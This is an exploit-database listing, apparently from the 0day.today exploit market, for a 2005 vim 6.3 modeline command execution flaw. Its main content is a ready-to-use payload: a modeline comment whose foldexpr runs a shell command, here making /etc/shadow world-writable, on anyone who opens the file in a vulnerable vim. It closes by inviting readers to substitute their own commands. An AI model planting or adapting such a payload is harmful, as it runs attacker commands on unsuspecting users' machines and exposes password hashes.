[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

vim 6.3 < 6.3.082 (modlines) Local Command Execution Exploit

Author
Georgi Guninski
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-7474
Category
local exploits
Date add
24-07-2005
Platform
multiple
============================================================
vim 6.3 < 6.3.082 (modlines) Local Command Execution Exploit
============================================================




1) open up a text file.

2) insert at the top the information (below).

/* vim: foldmethod=expr:foldexpr=glob("`chmod\ 666\ /etc/shadow`") */

3) if modlines = on anyone that opens the file with vim will execute the command:
   chmod 666 /etc/shadow
   
Have fun making your own commands.

The advisory can be found at:
  http://www.guninski.com/where_do_you_want_billg_to_go_today_5.html

/str0ke



#  0day.today [2024-11-16]  #